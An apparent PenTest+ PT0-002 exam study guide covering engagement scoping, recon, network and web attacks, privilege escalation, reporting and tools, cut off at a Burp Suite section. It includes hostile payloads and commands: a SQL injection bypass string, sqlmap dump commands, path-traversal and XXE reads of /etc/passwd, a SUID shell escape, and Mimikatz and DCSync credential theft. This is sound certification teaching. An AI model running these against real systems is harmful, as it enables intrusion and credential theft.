CertQuests
Study ethical hacking on the go with our IT certification podcast
Nmap tricks, Metasploit walkthroughs, and PenTest+ exam strategies explained for commutes and workouts. New episodes weekly.
Listen on SpotifyPT0-002 Exam Snapshot
| Exam code | PT0-002 |
| Questions | Up to 85 (multiple choice + PBQ) |
| Passing score | 750 / 900 |
| Duration | 165 minutes |
| Exam fee | ~$392 USD |
| Prerequisite | Security+ or equivalent experience recommended |
| Validity | 3 years (renewable via CEUs or retake) |
Domain Weights
Planning and Scoping14%
Information Gathering & Vulnerability Scanning22%
Attacks and Exploits30%
Reporting and Communication18%
Tools and Code Analysis16%
Rules of Engagement vs Authorization Letter
The Rules of Engagement (ROE) defines what you can test and how. The authorization letter (get-out-of-jail-free letter) is signed proof of permission. Both are required before any active testing begins. A missing authorization letter exposes the tester to criminal liability — even with the client's verbal approval.
CVSS Scoring — What the Exam Expects
- Critical (9.0–10.0): Remote, unauthenticated, no user interaction, full CIA impact
- High (7.0–8.9): Remote or requires some privilege; significant impact
- Medium (4.0–6.9): Requires local access, user interaction, or limited impact
- Low (0.1–3.9): Minimal exploitability or negligible impact
CVSS v3.1 base metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability.
Course Modules
01
Planning, Scoping & Engagement Setup
3 lessons · ~3h
Planning, Scoping & Engagement Setup
3 lessons · ~3h
Pentesting starts before
nmap runs — it starts with paperwork. Get the scope, rules of engagement, and signed authorization right or you become the attacker the client prosecutes. Know the engagement flavors (black/grey/white box), the legal contracts (MSA, SOW, NDA), the compliance drivers (PCI-DSS, HIPAA, SOX, GDPR), and where threat modeling slots in.
Engagement Types and Legal Foundations
Key Concepts
- Black Box: No prior information provided — simulates an external attacker. The tester must discover all targets from scratch through reconnaissance. Most time-consuming but most realistic external threat simulation
- White Box (Crystal Box): Full information provided including network diagrams, source code, credentials, and architecture documentation. Most efficient for thorough testing but least realistic as an adversary simulation
- Gray Box: Partial information — often low-privilege credentials and a basic network map. Balances realism with efficiency. Most common in real-world assessments
- External vs. Internal: External tests target internet-facing systems from outside the network perimeter. Internal tests simulate an insider threat or post-breach attacker from within the network
- Physical Penetration Testing: Tests physical security controls — badge readers, locks, cameras, guard procedures. Includes tailgating, badge cloning, and dumpster diving scenarios
- Social Engineering Assessments: Tests employee susceptibility to phishing, vishing (phone), smishing (SMS), and in-person pretexting. Governed by strict scope rules to avoid harming employees
The PenTest+ exam frequently tests knowledge of these engagement types and when to use each. Gray box is most common in practice because it provides a good balance of realism and coverage efficiency.
Scoping Documents and Legal Agreements
Key Concepts
- Statement of Work (SOW): Defines deliverables, timelines, milestones, and payment terms. The contractual backbone of the engagement
- Rules of Engagement (ROE): Operational document defining: IP ranges in scope, systems to avoid, allowed attack techniques, testing windows, escalation procedures, and emergency contacts
- Non-Disclosure Agreement (NDA): Protects the client's confidential information. Prevents the tester from disclosing findings to third parties
- Authorization Letter / Get-Out-of-Jail-Free Letter: Written permission signed by an authorized representative. Proves the testing is legally authorized. Must be available during the engagement
- Master Service Agreement (MSA): Umbrella agreement covering all future engagements with a client. Individual engagements are governed by Statements of Work under the MSA
- Third-Party Authorization: Any cloud provider, ISP, or co-location facility must separately authorize testing of shared infrastructure. AWS, Azure, and GCP have formal penetration testing policies
Know which document is signed before testing starts. The ROE is operational; the authorization letter provides legal protection; the NDA ensures confidentiality. All three must be in place before any active testing.
Threat Modeling and Compliance Drivers
Key Concepts
- STRIDE Threat Model: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used to classify threats during the planning phase
- PTES (Penetration Testing Execution Standard): Seven-phase framework: pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, reporting
- PCI DSS Requirement 11.3: Mandates annual penetration testing and after significant changes. Requires both external and internal tests. Testers must follow a defined methodology
- NIST SP 800-115: Technical Guide to Information Security Testing. Defines four phases: planning, discovery, attack, reporting
- Bug Bounty Programs: Crowdsourced vulnerability discovery with defined scopes and safe harbor provisions. Differ from traditional pentests in scope, payment structure, and reporting cadence
Compliance drivers determine the frequency and scope of required testing. PCI DSS is the most commonly tested compliance requirement on the PenTest+ exam.
📋 Scenario — drafting a Rules of Engagement for a black-box test
Situation: A client hires your firm for a black-box external penetration test of their web application. Before any testing begins, you must establish the Rules of Engagement (RoE).
Key RoE clauses to define: Scope: "Testing limited to app.client.com and API at api.client.com. Subdomains not listed are out of scope." Timing: "Testing permitted 6 PM–6 AM weekdays and all day weekends to minimise production impact." Authorization: Client executive signs a written Statement of Work authorising the test — this is your legal protection. Communication: "If critical vulnerability found (RCE, SQLi with data access), pause and notify client within 2 hours before further exploitation." Data handling: "All data found during testing is treated as confidential and returned/destroyed per Section 4." Emergency stop: Two client contacts listed; tester halts immediately if called.
Exam pattern: The PT0-002 exam frequently asks "what should a tester do FIRST?" before an engagement — the answer is always "obtain written authorization" and "define scope". Testing without a signed RoE is unauthorized access regardless of intent.
Key takeaways
- No signed authorization = no test. The get-out-of-jail letter with explicit scope, IP ranges, and emergency contacts is the single most important pre-engagement artifact.
- Black box (zero info), grey box (partial info, e.g., creds), white box (full architecture) shape both the test's realism and its budget — the exam asks you to match a scenario to a flavor.
- PCI-DSS mandates pentests annually + after any significant change; HIPAA requires risk assessments but not specifically pentests; SOX cares about financial-reporting controls. Match the regulation to the requirement.
⚡ Mini-quiz — Drill engagement flavors, MSA/SOW/NDA distinctions, and compliance-driven test mandates.
Quick quiz →
02
Information Gathering & OSINT
3 lessons · ~5h
Information Gathering & OSINT
3 lessons · ~5h
Reconnaissance is split in two: passive (no packets to the target — OSINT, WHOIS, certificate transparency, Shodan, leaked creds) and active (you touch the target — DNS, port scanning, banner grabbing, vuln scanning). The exam tests which technique fits which phase and which tools are stealthy vs noisy.
Passive Reconnaissance Techniques
Key Concepts
- WHOIS: Public registration records revealing registrant name, email, registrar, nameservers, and registration dates. Useful for identifying contacts and associated IP ranges
- DNS Enumeration: Querying DNS records (A, MX, NS, TXT, CNAME) to map the target's infrastructure. DNS zone transfers (AXFR) can expose all internal records if misconfigured
- Google Dorking: Advanced search operators to find indexed sensitive content. Common dorks:
site:target.com filetype:pdf,intitle:"index of",site:target.com ext:conf - Shodan: Search engine for internet-facing devices. Indexes port/service data, banners, and vulnerabilities. Used passively — queries go to Shodan's database, not the target
- theHarvester: Aggregates email addresses, employee names, subdomains, and IP ranges from search engines, LinkedIn, Shodan, and Hunter.io
- Certificate Transparency Logs: Public records of all SSL/TLS certificates issued. crt.sh reveals all subdomains that have received certificates — including staging, admin, and internal-facing hosts
- LinkedIn / Social Media: Reveals employee names, job titles, technologies in use (from job postings), and organizational structure for social engineering targeting
On the exam, passive recon = no packets sent to the target. If a technique contacts the target's systems, it is active. Shodan, theHarvester, and Google dorking are passive; Nmap, Nikto, and banner grabbing are active.
Active Scanning and Service Enumeration
Key Concepts
- Nmap SYN Scan (
-sS): Half-open scan — sends SYN, receives SYN-ACK (open) or RST (closed), then resets. Stealthier than full connect scan because no application-layer session is established - Nmap Full Connect Scan (
-sT): Completes the TCP three-way handshake. Slower and generates application logs. Used when -sS is not possible (non-root users) - Service Version Detection (
-sV): Probes open ports and identifies the specific service name and version. Critical for identifying outdated, vulnerable software - NSE (Nmap Scripting Engine): Extends Nmap with hundreds of scripts for vulnerability detection, service enumeration, authentication testing, and exploitation. Scripts are categorized: auth, discovery, vuln, exploit
- Aggressive Mode (
-A): Enables OS detection, version detection, default scripts, and traceroute in one flag. Not recommended for stealth-sensitive engagements - Banner Grabbing: Connecting to a service port and reading the initial response. Tools: Netcat (
nc), Telnet, curl. Reveals service type and version without full scanning - SMB Enumeration (enum4linux): Retrieves shares, users, groups, password policy, and OS info from Windows systems via NetBIOS/SMB without credentials (if null sessions are permitted)
Nmap is the most tested tool on PenTest+. Know the key flags: -sS (SYN scan), -sT (connect scan), -sU (UDP), -sV (version), -O (OS), -A (aggressive), -p (ports), --script, -T (timing 0-5).
Vulnerability Scanning
Key Concepts
- Nessus: Industry-leading vulnerability scanner. Credentialed scans log into systems to check installed software versions, missing patches, configuration flaws, and user account settings — far more thorough than unauthenticated scans
- OpenVAS / Greenbone: Open-source alternative to Nessus. Full vulnerability management platform with web interface, policy management, and reporting
- Nikto: Web server scanner testing for outdated server versions, dangerous HTTP methods, default files, and missing security headers. Not a deep application scanner
- Credentialed vs. Unauthenticated Scans: Credentialed scans require login credentials and examine internal configuration. Unauthenticated scans only see what is exposed over the network — similar to what an external attacker sees
- False Positives and False Negatives: False positives are reported vulnerabilities that do not actually exist. False negatives are real vulnerabilities the scanner missed. Manual verification is always required after automated scanning
- Scan Timing and Throttling: Aggressive scan speeds can trigger IDS/IPS alerts or crash fragile systems. Engagement ROE should specify acceptable scan rates
The exam distinguishes between vulnerability scanners (Nessus, OpenVAS — identify and report) and exploitation frameworks (Metasploit, Burp Suite — actually exploit). Know which tools fall into each category.
📋 Scenario — passive OSINT recon before the first packet is sent
Situation: Scope: targetcorp.com. Objective: map the external attack surface before any active scanning. All activity must be passive (no packets sent to the target).
Walk: 1) DNS enumeration: whois targetcorp.com (registrar, nameservers, registration dates). dig targetcorp.com MX (mail provider — often reveals O365 or Google Workspace). dig targetcorp.com TXT (SPF records reveal email infrastructure). 2) Certificate transparency: Search crt.sh/?q=targetcorp.com → reveals all subdomains that have had TLS certs issued: mail.targetcorp.com, vpn.targetcorp.com, dev.targetcorp.com. 3) Google dorking: site:targetcorp.com filetype:pdf (find public documents). site:targetcorp.com inurl:admin. 4) LinkedIn: search the company to map employees, technologies, and org structure. Tech stack often leaks in job postings. 5) Shodan: search the company's IP ranges for exposed services (RDP, SMB, Jenkins, Elasticsearch).
Exam pattern: Passive recon = no packets to target. Active recon = scanning/probing (requires authorization). The exam distinguishes these phases and tests which tools belong to each.
Key takeaways
- Passive recon leaves no trace on the target — Google dorks,
theHarvester, Shodan, Hunter.io, GitHub search for leaked tokens. Always exhaust passive before going active. - Active scanning toolkit:
nmap -sS(SYN stealth) for TCP,-sUfor UDP,-sVfor version detection,-Ofor OS fingerprinting,-T4for speed (noisier). - Vulnerability scanners (Nessus, OpenVAS, Nikto for web) generate noise + create CVE lists, not exploits — they're an input to the exploitation phase, not a substitute for it.
⚡ Mini-quiz — Drill passive vs active recon, nmap scan-type flags, and where vuln scanners fit in the kill chain.
Quick quiz →
03
Network Attacks & Exploitation
3 lessons · ~6h
Network Attacks & Exploitation
3 lessons · ~6h
The exploitation core: Metasploit as the framework (msfconsole, modules, payloads, listeners), protocol-level attacks (ARP spoofing, DHCP starvation, DNS poisoning, SMB Relay), and the always-in-scope physical/wireless attacks (PMKID, Evil Twin, RFID cloning, tailgating). Know the right module families and the listener types — staged vs stageless.
Metasploit Framework
Key Concepts
- msfconsole Workflow:
searchto find modules →useto select →show optionsto view required settings →set RHOSTSandset PAYLOAD→checkto verify vulnerability →runorexploitto execute - Exploit Modules: Contain the attack code targeting a specific vulnerability in a specific software version. Ranked by reliability: Excellent, Great, Good, Normal, Average, Low, Manual
- Payloads: Code that executes after successful exploitation. Singles (self-contained), Stagers (download larger payload), Stages (downloaded by stager). Common payloads: meterpreter, shell, cmd/unix/interact
- Meterpreter: Advanced in-memory payload providing: file system access, process migration, privilege escalation, keystroke logging, screenshot capture, pivoting, and post-exploitation modules — all without writing to disk
- Post-Exploitation Modules: Run after gaining a session:
post/multi/recon/local_exploit_suggesterfor privilege escalation paths,post/windows/gather/hashdumpfor credential extraction - Sessions:
sessions -llists active sessions.sessions -i [id]interacts with a session. Background active session with Ctrl+Z
The `check` command in Metasploit tests exploitability without executing the payload — always use it first to avoid causing unintended system crashes (especially relevant for EternalBlue/MS17-010 which can BSOD Windows 7).
Network and Protocol Attacks
Key Concepts
- ARP Poisoning / MitM: Sending gratuitous ARP replies to poison victim ARP caches. The victim sends traffic to the attacker instead of the real gateway. Tools: arpspoof, bettercap. Requires LAN access
- Pass-the-Hash (PtH): Using a captured NTLM hash to authenticate to Windows services without cracking the hash. Possible because NTLM authentication uses the hash directly in the challenge-response protocol
- Kerberoasting: Any domain user can request a TGS for any SPN. The TGS is encrypted with the service account's hash and can be cracked offline with Hashcat. High-privilege service accounts with weak passwords are primary targets
- AS-REP Roasting: Targets accounts with Kerberos pre-authentication disabled. These accounts return an AS-REP encrypted with their password hash, which can be cracked offline without any domain credentials
- Password Spraying: Testing one common password (Password1!) across many accounts to avoid lockout. Contrasts with brute-force (many passwords against one account). Effective against default password policies
- Credential Stuffing: Using leaked username/password pairs from data breaches against other services. Exploits password reuse
Windows Active Directory attacks (Pass-the-Hash, Kerberoasting, AS-REP Roasting) are heavily tested on PenTest+. Understand the mechanism behind each attack, not just the tool name.
Wireless and Physical Attacks
Key Concepts
- WPA2 PMKID Attack: Modern technique that extracts the PMKID from a single EAPOL frame (no handshake capture needed). The PMKID is computed from the PSK and can be cracked offline. Tools: hcxdumptool + hashcat
- Four-Way Handshake Capture: Classic WPA2 cracking method using airodump-ng + aircrack-ng. Capture the handshake during a client authentication event, then crack offline with a dictionary
- Evil Twin Attack: Rogue AP with same SSID and higher signal strength. Clients roam to attacker's AP. Deploy a captive portal to capture credentials or intercept HTTP traffic
- Deauthentication Attack: Injecting 802.11 deauth frames forces clients to disconnect from the legitimate AP. Combined with evil twin to force reassociation. Tool: aireplay-ng -0
- KARMA Attack: The rogue AP responds to probe requests for any SSID, automatically matching whatever the client is looking for. Exploits the Preferred Network List (PNL)
- Tailgating / Piggybacking: Following an authorized person through a secure door without badging in. Most common physical security bypass. Prevented by mantraps, turnstiles, and security awareness training
- Badge Cloning: Using a Proxmark or similar device to read and clone RFID/HID proximity card data. Many older access control systems use 125kHz cards that have no encryption
Wireless attacks are a significant portion of Domain 3. Know the difference between passive attacks (capturing handshakes) and active attacks (deauth frames, evil twin). Passive analysis of wireless traffic is legal in most jurisdictions; active injection may not be — always check the ROE.
📋 Scenario — network scanning and service enumeration (authorized lab)
Situation (authorized internal test): You've confirmed written authorization for the 192.168.1.0/24 segment. Goal: identify live hosts, open ports, and service versions before exploitation.
Walk: 1) Host discovery: nmap -sn 192.168.1.0/24 → finds live hosts without port scanning (ICMP + ARP). 2) Port scan: nmap -sS -p- --open -T4 192.168.1.50 (SYN scan, all ports, fast). 3) Service version: nmap -sV -sC -O 192.168.1.50 (service detection, default scripts, OS fingerprint). Output shows SSH 7.6 (Ubuntu), Apache 2.4.29, SMB open on 445. 4) SMB enumeration: enum4linux-ng 192.168.1.50 → reveals shares, users, domain info. 5) Vulnerability scan: nmap --script vuln 192.168.1.50 → flags CVE-2017-0143 (EternalBlue) on port 445.
Exam pattern: Know the difference between -sS (SYN/stealth), -sT (full TCP connect), -sU (UDP), and -sV (version). The exam gives scan output and asks you to identify the scan type or interpret the results.
Key takeaways
- Metasploit module hierarchy:
exploit/delivers code →payload/runs on target →auxiliary/for scanners/fuzzers →post/for after-access. SetRHOSTS,LHOST,LPORT, runexploit. - SMB Relay is the network-attack gold standard: capture an NTLM auth from one host, relay it to another without cracking the hash. Requires SMB signing disabled on the relay target.
- Wireless: capture a PMKID or 4-way handshake → crack offline with
hashcat. Evil Twin is a rogue AP using the same SSID + captive portal to harvest creds; works because users' devices auto-join known SSIDs.
⚡ Mini-quiz — Drill Metasploit module types, payload selection, SMB Relay prerequisites, and wireless capture flows.
Quick quiz →
04
Web Application Attacks
3 lessons · ~6h
Web Application Attacks
3 lessons · ~6h
Web-app pentest is the OWASP Top 10 in question form. Injection (SQLi, command injection, LDAP injection, XXE) takes the crown for impact; cross-site (XSS, CSRF, SSRF) and broken auth (session fixation, JWT none-alg) round out the high-frequency findings. Tooling:
sqlmap, Burp Suite, ffuf, gobuster.
Injection Vulnerabilities
Key Concepts
- SQL Injection (SQLi): Inserting SQL syntax into application inputs to manipulate the database query. Types: in-band (classic), blind (boolean/time-based when no output is returned), out-of-band (data exfiltrated via DNS/HTTP). Tool: sqlmap automates detection and exploitation
- Authentication Bypass via SQLi: Classic payload
' OR '1'='1makes the WHERE condition always true, bypassing credential validation without knowing valid credentials - UNION-Based SQLi: Appends a UNION SELECT statement to the query to retrieve data from other tables. Requires knowing the number of columns in the original query (identify via ORDER BY or error messages)
- OS Command Injection: Unsanitized user input passed to a shell function (
system(),exec()). Shell metacharacters (;,|,&&,`) chain additional commands. Can lead to RCE - Server-Side Template Injection (SSTI): Template engines (Jinja2, Twig, Freemarker) evaluate expressions. If user input is rendered unsanitized, expressions like
{{7*7}}execute code server-side. Can escalate to full RCE - LDAP Injection: Manipulating LDAP queries by injecting special characters (*, ), (, \) into input fields used to construct LDAP filter strings. Can bypass authentication or dump directory data
SQLi remains the most impactful class of web vulnerability. The PenTest+ exam focuses on understanding the mechanism (why it works) as much as the tool (sqlmap). Know how to identify blind vs. in-band SQLi and choose the appropriate testing technique.
Cross-Site Attacks and Client-Side Vulnerabilities
Key Concepts
- Reflected XSS: Malicious script is injected into a URL parameter and reflected back in the response without storage. Requires tricking the victim into clicking a crafted link. Common in search boxes and error messages
- Stored XSS: Script is persisted in the server's database and executed for every user who loads the affected page. Higher severity because it does not require social engineering to deliver
- DOM-Based XSS: The vulnerability exists in client-side JavaScript that reads attacker-controlled data (URL hash, query string) and writes it to the DOM unsanitized. No server-side interaction — the server response is benign
- CSRF (Cross-Site Request Forgery): Forces a victim's authenticated browser to make unauthorized state-changing requests to a trusted site. Prevented by anti-CSRF tokens (unique, unpredictable values in every form)
- Clickjacking: Overlays a transparent iframe of the target site over a decoy page. Victim clicks on the decoy but the click goes to the target site. Prevented with X-Frame-Options or Content-Security-Policy: frame-ancestors
- Open Redirect: Application accepts a URL as a redirect parameter without validation. Attackers craft links using the trusted domain that redirect to malicious sites. Used in phishing campaigns
XSS attack types are a common exam topic. The key distinction: Reflected = immediate response, Stored = persisted in DB, DOM = client-side only. Always check which type is present before testing bypasses.
Advanced Web Vulnerabilities
Key Concepts
- Path Traversal (Directory Traversal): Using
../sequences to access files outside the intended web root. Common payloads:../../../../etc/passwd,..\..\Windows\System32\cmd.exe. Some filters require URL encoding:%2e%2e%2f - Server-Side Request Forgery (SSRF): Application fetches URLs provided by the user. Attacker supplies internal URLs: AWS metadata endpoint (169.254.169.254), internal APIs, admin interfaces. Can exfiltrate cloud credentials or scan internal networks
- Insecure Direct Object Reference (IDOR): Predictable resource identifiers in URLs or parameters expose other users' data. Changing
?id=1234to?id=1235accesses another user's record. Prevented by authorization checks on every data access - XML External Entity (XXE): Malicious XML input references an external entity. The XML parser resolves it, reading local files or making HTTP requests. Payload:
<!ENTITY xxe SYSTEM "file:///etc/passwd"> - Insecure Deserialization: Application deserializes attacker-controlled data. Manipulated serialized objects can trigger arbitrary code execution. Affects Java, PHP, Python, and .NET applications using native serialization
- Security Misconfigurations: Default credentials, exposed admin interfaces, verbose error messages, directory listing enabled, CORS wildcard (
Access-Control-Allow-Origin: *), HTTP methods (PUT, DELETE) left enabled
SSRF targeting cloud metadata endpoints is one of the most impactful modern web vulnerabilities. AWS IMDSv2 mitigates SSRF by requiring PUT requests with session tokens, but not all organizations have upgraded. Know the 169.254.169.254 address cold.
📋 Scenario — testing for SQL injection in a login form (authorized)
Situation (authorized web app test): The target is a login form at https://app.client.com/login. Test for SQL injection using manual probing before running automated tools.
Walk: 1) Manual probe: Enter ' (single quote) in the username field. If the response changes (SQL error, blank page, different HTML) → potential SQLi. 2) Authentication bypass test: Username: ' OR '1'='1 / Password: anything → if it logs in, the query is vulnerable. 3) Automated confirmation: sqlmap -u "https://app.client.com/login" --data="user=test&pass=test" --level=3 --risk=2 --batch. sqlmap confirms the injection point and identifies the DBMS (e.g., MySQL 8.0). 4) Scope check: Before dumping data, confirm with the client whether data exfiltration is in scope. If yes and authorised: sqlmap ... --dump --tables -D app_db.
Exam pattern: PT0-002 tests both the manual technique (payloads, error-based detection) and the tool (sqlmap flags). Know that --level controls the number of tests and --risk controls how aggressive they are.
Key takeaways
- SQLi flavors: error-based (visible error reveals the schema), union-based (extract via
UNION SELECT), blind (boolean / time-based — no visible output, infer from response).sqlmapautomates all three. - XSS triad: reflected (payload in URL, requires victim click), stored (payload saved server-side, hits every viewer — worst impact), DOM-based (payload executes client-side via JS sink).
- SSRF turns the vulnerable server into your proxy — hit internal services, AWS IMDS (
169.254.169.254) for instance creds, or pivot to localhost-only admin panels. Defenders block via allow-listed outbound + IMDSv2.
⚡ Mini-quiz — Drill SQLi types, XSS variants, SSRF cloud-metadata attacks, and Burp Suite Intruder workflows.
Quick quiz →
Halfway there — reinforce with audio learning
Listening while reviewing notes is one of the most effective PenTest+ study techniques. Our podcast covers real-world attack walkthroughs you'll recognize on the exam.
Continue on Spotify
05
Post-Exploitation & Privilege Escalation
2 lessons · ~5h
Post-Exploitation & Privilege Escalation
2 lessons · ~5h
Foothold ≠ done. Post-exploitation is about privilege escalation, persistence, lateral movement, and credential extraction. The Linux track: SUID binaries, sudo misconfigs, kernel exploits, cron escalation. The Windows track: Kerberoasting, AS-REP roasting, token impersonation, DCSync, BloodHound for AD path-finding.
Linux Privilege Escalation
Key Concepts
- SUID/SGID Binaries: Files with SUID set run as the file owner (often root). Discovery:
find / -perm -4000 -type f 2>/dev/null. GTFOBins documents escape techniques for SUID binaries including vim, find, python, awk, and nmap - Sudo Misconfigurations:
sudo -llists allowed commands. Running allowed binaries with sudo that spawn shells (e.g.,sudo vimthen:!/bin/bash) grants root access - Cron Job Hijacking: World-writable scripts or binaries called by root-owned cron jobs. Replace or modify the script content to add a SUID binary or reverse shell
- Writable /etc/passwd: If the file is world-writable, add a new root user entry with a known password hash. Rare but high impact when found
- Kernel Exploits: Exploiting unpatched kernel CVEs (Dirty COW CVE-2016-5195, GameOver(lay) CVE-2023-2640). Check kernel version with
uname -rand research applicable exploits - PATH Hijacking: If a SUID binary calls another program by relative path, placing a malicious binary earlier in PATH causes the malicious version to execute with elevated privileges
SUID abuse is the most commonly tested Linux privilege escalation technique on PenTest+. Remember the GTFOBins resource — it catalogs escape techniques for dozens of standard binaries when run with elevated permissions.
Windows Privilege Escalation and Lateral Movement
Key Concepts
- Mimikatz sekurlsa::logonpasswords: Extracts plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. Requires SYSTEM or debug privilege. Mitigated by disabling WDigest caching and enabling Credential Guard
- Token Impersonation: Stealing security tokens from privileged processes using tools like Incognito (Metasploit module). Allows impersonating domain admins if their tokens are in memory
- Unquoted Service Paths: Windows services with unquoted paths containing spaces. Windows resolves
C:\Program Files\App\service.exeby tryingC:\Program.exefirst. Placing a malicious binary at an earlier resolution path escalates privileges - DLL Hijacking: Applications search for DLLs in directories they can write to. Placing a malicious DLL earlier in the search order causes it to load with the application's privileges
- Pass-the-Hash: Using captured NTLM hashes with PsExec, Impacket's wmiexec, or CrackMapExec to authenticate to other systems without knowing the plaintext password. Core lateral movement technique
- DCSync Attack: Uses the MS-DRSR protocol to simulate a domain controller and request password replication from the real DC. Requires Domain Replication privileges (Domain Admins, Enterprise Admins). Extracts all domain password hashes
Post-exploitation and lateral movement define what separates a pentest from a vulnerability assessment. The PenTest+ exam tests understanding of the full attack chain: initial access → privilege escalation → lateral movement → persistence → data access.
📋 Scenario — privilege escalation via misconfigured SUID binary (authorized lab)
Situation (authorized internal test): You have a low-privilege shell on a Linux host (192.168.1.50). Goal: escalate to root using local privilege escalation techniques.
Walk: 1) Enumerate SUID binaries: find / -perm -u=s -type f 2>/dev/null → output includes /usr/bin/find (unusual — find doesn't need SUID). 2) GTFOBins check: Search GTFOBins for "find SUID" → payload: find . -exec /bin/sh -p \; -quit. 3) Run the payload → whoami returns root. 4) Document: Screenshot the id command output showing uid=0(root) as proof. Note the misconfiguration: SUID set on find, which allows arbitrary command execution. 5) Remediation note in report: "Remove SUID bit from /usr/bin/find: chmod u-s /usr/bin/find".
Exam pattern: PT0-002 tests common Linux privesc vectors: SUID binaries, sudo misconfig (sudo -l), writable cron jobs, PATH hijacking. GTFOBins is the authoritative reference for living-off-the-land escalation.
Key takeaways
- Linux privesc reflex:
sudo -lfor misconfigs,find / -perm -4000 -type f 2>/dev/nullfor SUID binaries, check/etc/cron.d/+ writable PATH entries,linpeas.shfor automation. - Kerberoasting: request a TGS for any user with an SPN, the ticket is encrypted with the user's NTLM hash — crack offline. Service accounts with weak passwords are the gold mine.
- BloodHound + SharpHound map AD attack paths visually: ingest with
SharpHound.exe -c All, then "shortest path from Owned to Domain Admin" tells you exactly which lateral hop to take next.
⚡ Mini-quiz — Drill Linux SUID/sudo escalation, Kerberoasting prerequisites, and BloodHound shortest-path queries.
Quick quiz →
06
Reporting, Communication & Ethics
2 lessons · ~4h
Reporting, Communication & Ethics
2 lessons · ~4h
A pentest is judged by the report, not the exploits. The exam tests structure: executive summary (business-language risk), methodology (what you did, when, with what), findings (CVSS-scored, with remediation), and appendices (raw evidence). Plus the post-engagement obligations: artifact destruction, re-test scope, and the ethics that keep you employable.
Professional Penetration Test Report Structure
Key Concepts
- Executive Summary: Written for non-technical stakeholders. Covers: overall security posture, business risk of findings, prioritized remediation recommendations. No CVE numbers or command output
- Methodology: Describes the testing approach, tools used, and standards followed (PTES, OWASP, NIST). Provides context for the technical team
- Technical Findings: Each finding includes: title, severity rating (Critical/High/Medium/Low/Informational), CVSS score, affected asset, description, reproduction steps, evidence (screenshots/output), and remediation recommendation
- CVSS Scoring: Base score uses AV, AC, PR, UI, S, C, I, A metrics. Critical 9.0–10.0 requires network-accessible, no-auth, no-interaction, full CIA impact. Know the score ranges for all severity levels
- Risk Ratings: Risk = Likelihood × Impact. A theoretically critical vulnerability behind multiple compensating controls may be rated lower actual risk. Report both the raw CVSS and the contextual risk
- Attack Narrative: Tells the story of the engagement — initial access path, privilege escalation chain, and final impact. Demonstrates real-world business risk to stakeholders who do not read technical details
The exam frequently tests what belongs in the Executive Summary vs. Technical Findings. Rule of thumb: if it contains a command, CVE ID, or screenshot, it belongs in Technical Findings, not the Executive Summary.
Post-Engagement Activities and Ethics
Key Concepts
- Cleanup: Remove all backdoors, created accounts, uploaded files, C2 agents, and configuration changes. Document every artifact created and confirm removal. Failure to clean up can result in real attackers leveraging your tools
- Remediation Verification (Retesting): After the client patches, retest specific vulnerabilities to confirm fixes are effective. This is a targeted, scoped activity — not a full re-engagement
- Data Handling: Securely delete all client data after report delivery per the data handling agreement. Reports containing sensitive data must be encrypted at rest and in transit
- Responsible Disclosure: For zero-days found in third-party vendor software, follow coordinated disclosure: notify the vendor, allow a reasonable remediation window (typically 90 days), then disclose publicly
- Non-Disclosure: Findings are confidential. Sharing client vulnerabilities with third parties (without authorization) violates the NDA and may constitute criminal computer fraud
- Debrief: Walk the client's technical team through findings, reproduction steps, and remediation priorities. Provides context that a written report alone cannot convey
Ethics questions are common on PenTest+. The exam tests whether candidates understand boundaries: you cannot keep access after engagement end, you cannot retain client data beyond the agreed period, and you must disclose zero-days responsibly.
📋 Scenario — structuring a pentest finding write-up
Situation: You found SQL injection in the client's login form that allows unauthenticated access to the full user database (50,000 records including hashed passwords). Write the finding.
Finding structure (per PT0-002 report standard): Title: SQL Injection — Authentication Bypass and Full Database Exposure. Severity: Critical (CVSS 3.1 Base Score: 9.8). Affected Component: POST /login (parameter: username). Description: The login form is vulnerable to SQL injection. An unauthenticated attacker can bypass authentication by submitting ' OR '1'='1 as the username, and can extract all records from the app_db database using automated tools. Evidence: Screenshot of successful bypass; sqlmap output showing 50,000 rows extracted. Risk/Business Impact: Full compromise of customer PII; regulatory exposure under GDPR; potential for credential-stuffing attacks. Remediation: Use parameterised queries / prepared statements; implement WAF rules blocking common SQLi payloads; enforce input validation.
Exam pattern: PT0-002 tests that testers report findings with severity (Critical/High/Medium/Low/Informational), business impact, and actionable remediation — not just "we found a bug".
Key takeaways
- Findings need CVSS scoring + business-impact framing: "Critical RCE on payment server" lands harder than "Apache Struts CVE-2017-5638". Sort by risk, not by domain.
- Every finding has a remediation the client can execute — vague ("patch all systems") fails. Include exact commands, configs, or upgrade paths plus a re-test plan.
- Ethics gates: destroy or return all customer data per the SOW, never sell or disclose findings, report illegal-activity discoveries (CP, fraud) per contract clauses, NDA stays valid past engagement end.
⚡ Mini-quiz — Drill report structure, CVSS-based prioritization, and post-engagement ethical obligations.
Quick quiz →
07
Penetration Testing Tools & Code Analysis
3 lessons · ~6h
Penetration Testing Tools & Code Analysis
3 lessons · ~6h
The tool fluency the exam tests by name:
nmap, Burp Suite, Metasploit, hashcat, john, hydra, responder, impacket (PsExec, secretsdump, GetUserSPNs), mimikatz, BloodHound. Plus enough Python / Bash / PowerShell to script the gaps and read the public PoC exploits you're pasting from GitHub.
Essential Pentesting Tools Reference
Key Tools by Category
- Reconnaissance: theHarvester (OSINT), Maltego (link analysis), Shodan (device search), SpiderFoot (automated OSINT), Recon-ng (framework)
- Scanning: Nmap (port/service/OS), Nessus (vulnerability scanner), OpenVAS, Nikto (web server), Gobuster / dirb / ffuf (directory brute-force)
- Exploitation: Metasploit Framework (general), sqlmap (SQL injection), Hydra / Medusa (password attacks), BeEF (browser exploitation)
- Web Application: Burp Suite (proxy/scanner/intruder), OWASP ZAP (open-source alternative), sqlmap, WPScan (WordPress), Nikto
- Post-Exploitation: Mimikatz (Windows credential extraction), BloodHound (AD attack path mapping), Impacket (Python AD tools), CrackMapExec
- Wireless: Aircrack-ng suite (airodump-ng, aireplay-ng, aircrack-ng), Wireshark, hcxdumptool (PMKID capture), Kismet
- Traffic Analysis: Wireshark (packet capture/analysis), tcpdump (CLI capture), Netcat (nc — port scanning, banners, file transfer, reverse shells)
Match tools to their primary use case. The exam often presents a scenario and asks which tool is MOST appropriate. Know the difference between vulnerability scanners (Nessus, Nikto) and exploitation tools (Metasploit, sqlmap).
Burp Suite Deep Dive
Key Concepts
